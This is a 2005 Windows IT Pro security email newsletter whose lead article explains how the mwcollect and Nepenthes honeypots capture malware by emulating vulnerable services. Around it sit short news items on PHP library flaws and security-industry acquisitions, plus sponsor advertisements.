Security UPDATE -- Honeypots That Collect Malware -- August 31, 2005
isn at c4i.org
Thu Sep 1 05:15:51 EDT 2005
This email newsletter comes to you free and is supported by the
following advertisers, which offer products and services in which
you might be interested. Please take a moment to visit these
advertisers' Web sites and show your support for Security UPDATE.
A Robust Combination from Symantec
How to solve the anti-spam dilemma
1. In Focus: Honeypots That Collect Malware
2. Security News and Features
- Recent Security Vulnerabilities
- Vulnerabilities in PHP-based Libraries
- Secure Computing to Acquire CyberGuard
- EarthLink to Acquire Security Solutions Maker Aluria Software
3. Security Toolkit
- Security Matters Blog
4. New and Improved
- Pocket PC File Encryption
==== Sponsor: Symantec ====
A Robust Combination from Symantec
Staying on top of today's vulnerabilities and threats is one of the
most difficult, time-consuming, and even risky tasks facing IT
professionals like you. Never has it been so important to proactively
manage your IT environment. Fortunately, Symantec can help.
Symantec LiveState Patch Manager 6.0 helps keep your enterprise
devices secure and available by identifying known vulnerabilities and
then installing necessary patches on hundreds of systems in minutes,
not hours. That includes mobile and remote devices, too.
For extra protection from threats that even the latest patches can't
address, there's Symantec Client Security 3.0. With its exclusive
intrusion prevention technology, Symantec Client Security 3.0
proactively protects systems against known and unknown exploits before
they can compromise your system, including spyware, adware, viruses,
and other malicious intrusions. Learn more at
==== 1. In Focus: Honeypots That Collect Malware ====
by Mark Joseph Edwards, News Editor, mark at ntsecurity / net
The last two weeks, I've written about proactive honeypots that seek
out malicious Web sites, two of which are unavailable to the public and
one that you can download to run on your own networks. If you missed
either of those articles, they're available on our Web site at the URLs
below. This week, I'll discuss two "passive" honeypots--that is,
honeypots that sit waiting for intrusion attempts.
Because honeypots present an attack point for potential intruders,
they're useful in determining what sort of intrusion attempts are being
launched against your network. In some cases, they can detect intrusion
methods that are completely unknown to even the most up-to-date
Intrusion Detection Systems (IDSs).
I recently learned about two new honeypots. The first is mwcollect (at
the URL below), which was released in April 2005 and is partially
funded by The Honeynet Project. Mwcollect is designed specifically to
collect malware--thus the "mw" prefix in the mwcollect name. The tool
runs on Linux and OpenBSD and can also run on Cygwin, a Linux
environment that runs on Windows platforms.
Mwcollect is a little different from typical honeypots because it was
originally designed to collect bot software, but the current version
collects worms and other forms of malware that take advantage of
vulnerabilities that mwcollect exposes. According to the mwcollect Web
site, systems that run the tool can't be infected with malware due to
the way mwcollect operates internally. It binds to specified ports,
waits for an exploit attempt, scans for shell code, and tries to
download any related malware. Captured malware can then be added to a
database at the mwcollect Web site.
The next version of mwcollect will allow three levels of network
interactivity. The first level is the same as I describe above. The
second level will passively analyze network traffic (like a sniffer in
promiscuous mode would) and will try to download any related malware.
The third or lowest level of interactivity will also passively analyze
network traffic but won't try to download related malware. You can
learn a little more about the tool at the Web site, and join in an
Internet Relay Chat (IRC) for further discussion.
The second new honeypot, Nepenthes, was released earlier this month and
is similar to mwcollect. It too presents known vulnerabilities to the
network and waits for intrusion attempts. Current modules for Nepenthes
allow it to emulate problems with DCOM, Local Security Authority
Service (LSASS), WINS, ASN1, NetBIOS, SQL Server, and a lot more
Microsoft services. Because Nepenthes runs on Linux systems, none of
those services would actually be available, which means exploits
against them would have little or no effect on the underlying OS.
Just like mwcollect, when Nepenthes detects intrusion attempts, it
tries to download any related malware through a variety of methods
including FTP, Trivial FTP (TFTP), and HTTP. Captured malware is then
sent to a center server hosted by the developers of the tool.
Documentation for Nepenthes doesn't explain what goes on under the
hood. But as best I can determine (I haven't actually installed the
tool yet), it captures shell-code exploits; looks for instructions that
try to download code from the Internet (which many types of malware
have); and if it finds such instructions, proceeds to try to download
the malware in accordance with the intruder's intent--for example, if
the captured code indicates that the system should use FTP to download
a file, Nepenthes will try to do that. I suspect that mwcollect works
in a similar fashion. Nepenthes doesn't appear to run on Windows
platforms using Cygwin, so you'll probably need a Linux-based system to
put it to use on your networks.
If you use honeypots as do so many administrators these days, be sure
to take a closer look at mwcollect and Nepenthes.
We need your help! Windows IT Pro is launching its second Windows IT
Pro Industry Salary Survey, and we want to find out all about you and
what makes you a satisfied IT pro. When you complete the survey (about
10 minutes of your time), you'll be entered in a drawing for one of two
$300 American Express gift certificates. Look for the survey results--
and see how you stack up against your peers--in our December issue. To
take the survey, go to
==== Sponsor: Postini ====
How to solve the anti-spam dilemma
In this free white paper learn why older spam prevention
technologies using traditional content filtering don't work against the
latest spammer tactics - and why more corporate email administrators
are turning to a more accurate, more effective approach: managed email
security service. Find out how to achieve email security dynamically
with multiple layer protection ... minimize false positives ... cut
email administration costs (and hassles) ... and keep user communities
happy and productive. Download your free copy now.
==== 2. Security News and Features ====
Recent Security Vulnerabilities
If you subscribe to this newsletter, you also receive Security
Alerts, which inform you about recently discovered security
vulnerabilities. You can also find information about these
Vulnerabilities in PHP-based Libraries
Major security problems in two popular Hypertext Preprocessor (PHP)-
based libraries have led to complete removal of a particular
programming function in those libraries. In June, problems were
discovered in libraries that provide PHP-based support for XML and RPC,
both of which are used by many applications today, including hugely
popular blog software packages. A subsequent code audit revealed still
Secure Computing to Acquire CyberGuard
Secure Computing announced that it will acquire CyberGuard. Under
the terms of the deal, Secure Computing will acquire all outstanding
shares of CyberGuard common stock and in turn give shares of its common
stock, as well as cash, to CyberGuard stockholders.
EarthLink to Acquire Security Solutions Maker Aluria Software
EarthLink and Aluria Software announced a deal in which EarthLink
will acquire the assets of Aluria, makers of the Spyware Eliminator
software. Terms of the deal, expected to close in September, weren't
==== Resources and Events ====
SQL Server 2005 Roadshow Is Coming to a City Near You
Get the facts about migrating to SQL Server 2005. SQL Server experts
will present real-world information about administration, development,
and business intelligence to help you implement a best-practices
migration to SQL Server 2005 and improve your database computing
environment. Attend and receive a 1-year membership to PASS and 1-year
subscription to SQL Server Magazine. Register now!
Consolidate Your SQL Server Infrastructure
Shared data clustering is the breakthrough consolidation solution
for Microsoft Windows servers. In this free Web seminar, learn how
shared data clustering technology can reduce capital expenditures by at
least 50 percent, improve management efficiency, reduce operational
expense, ensure high availability across all SQL Server instances, and
more! Find out how you can reduce the overall Total Cost of Ownership
(TCO) for SQL Server cluster deployments by as much as 60 percent over
three years! Sign up today!
High Risk Internet Access: Are You in Control?
Defending against Internet criminals, spyware, and phishing and
addressing the points of risk that Internet-enabled applications expose
your organization to can seem like an epic battle with Medusa. So how
do you take control of these valuable resources? In this free Web
seminar, you'll get the tools you need to help you analyze the impact
Internet-based threats have on your organization and tools to aid you
in the construction of Acceptable-Use Policies (AUPs).
Get Ready for SQL Server 2005 Roadshow in Europe
Back by popular demand--Get the facts about migrating to SQL Server
2005! SQL Server experts will present real-world information about
administration, development, and business intelligence to help you
implement a best-practices migration to SQL Server 2005 and improve
your database-computing environment. Receive a 1-year membership to
PASS and 1-year subscription to SQL Server Magazine. Register now!
Discover SQL Server 2005 for the enterprise. Are you prepared?
In this free, half-day event, you'll learn how the top new features
of SQL Server 2005 will help you create and manage large-scale,
mission-critical, enterprise database applications--making your job
easier. Find out how to leverage SQL Server 2005's new capabilities to
best support your business initiatives. Register today!
All high availability solutions are not created equal--how does yours
In this free Web seminar, you'll get the tools you need to ensure
your systems aren't going down. You'll discover the various categories
of high availability and disaster recovery solutions available and the
pros and cons of each. You'll learn what solutions help you take
preemptive, corrective action without resorting to a full system
failover, or in extreme cases, that perform a nondisruptive, automatic
switchover to a secondary server.
==== Featured White Paper ====
The Impact of Disk Defragmentation
Nearly every IT professional has a fragmentation horror story--in
which fragmentation severely degraded performance so that systems were
unusable. In this free white paper, learn what impact fragmentation has
on users and system activities and discover how quickly fragmentation
accumulates as a result of these activities. Plus get the
recommendations you need to manage the frequency of defragmentation
across your infrastructure.
==== 3. Security Toolkit ====
Security Matters Blog: Wi-Fi Security Is Better Than I Expected
by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=1264F:4FB69
There's a lot of talk about the need for increased Wi-Fi security. I
was surprised at what I found when I did a little "war driving" in my
by John Savill, http://list.windowsitpro.com/t?ctl=1264E:4FB69
Q: I created a custom .adm file and imported it into a Group Policy
Object's (GPO's) Administrative Templates. Why can't I see any of the
settings in Group Policy Editor (GPE)?
Find the answer at
==== Announcements ====
(from Windows IT Pro and its partners)
Stay Up-To-Date with the Windows IT Security Newsletter
Each new issue of the Windows IT Security newsletter features
related product coverage of the best security tools available and
expert advice on the best way to implement various security components.
We've also expanded our security content to include even more
fundamentals on building and maintaining a secure enterprise. In
addition, paid subscribers get online access to our entire online
security article database (over 1900 articles)! Subscribe today:
VIP Monthly Online Pass = Quick Security Answers!
Sign up today for your VIP Monthly Online Pass and get 24/7 access
to the entire online article database, including exclusive, subscriber-
only Windows IT Security newsletter content. That's a database of over
1900 security articles to help you get all the answers you need, when
you need them. Sign up now:
==== 4. New and Improved ====
by Renee Munshi, products at windowsitpro.com
Pocket PC File Encryption
Infotecs offers ViPNet Safe Disk for Pocket PC, which encrypts and
password-protects sensitive files on PDAs. Data is protected even when
the device is switched off or in standby mode. You can open and edit
any file from a secure folder in a word processor or database program--
the file is automatically decrypted when opened and encrypted when
saved. ViPNet Safe Disk for Pocket PC supports two 256-bit encryption
algorithms: Advanced Encryption Standard (AES) and Government Standard
(GOST). The interface is specially designed to help PDA users manage
protected files and folders with just a few taps. You can exchange
protected data with a PC that's running ViPNet Safe Disk. ViPNet Safe
Disk for Pocket PC runs under Windows Mobile 2003 and costs $26.40 for
a single-user license. For more information, go to
Tell Us About a Hot Product and Get a T-Shirt!
Have you used a product that changed your IT experience by saving
you time or easing your daily burden? Tell us about the product, and
we'll send you a T-shirt if we write about the product in a future
Windows IT Pro What's Hot column. Send your product suggestions with
information about how the product has helped you to
whatshot at windowsitpro.com.
Editor's note: Share Your Security Discoveries and Get $100
Share your security-related discoveries, comments, or problems and
solutions in the Windows IT Security print newsletter's Reader to
Reader column. Email your contributions (500 words or less) to
r2rwinitsec at windowsitpro.com. If we print your submission, you'll
get $100. We edit submissions for style, grammar, and length.
==== Sponsored Links ====
Professional and secure remote control from all major platforms
Argent Versus MOM 2005
Experts Pick the Best Windows Monitoring Solution
Tech jobs at Dice
Search 65K+ new IT jobs daily--Tech expert jobs at top companies!
==== Contact Us ====
About the newsletter -- letters at windowsitpro.com
About technical questions -- http://list.windowsitpro.com/t?ctl=12650:4FB69
About product news -- products at windowsitpro.com
About your subscription -- windowsitproupdate at windowsitpro.com
About sponsoring Security UPDATE -- salesopps at windowsitpro.com
This email newsletter is brought to you by Windows IT Security,
the leading publication for IT professionals securing the Windows
enterprise from external intruders and controlling access for
internal users. Subscribe today.
Windows IT Pro, a division of Penton Media, Inc.
221 East 29th Street, Loveland, CO 80538
Attention: Customer Service Department
Copyright 2005, Penton Media, Inc. All rights reserved.
More information about the ISN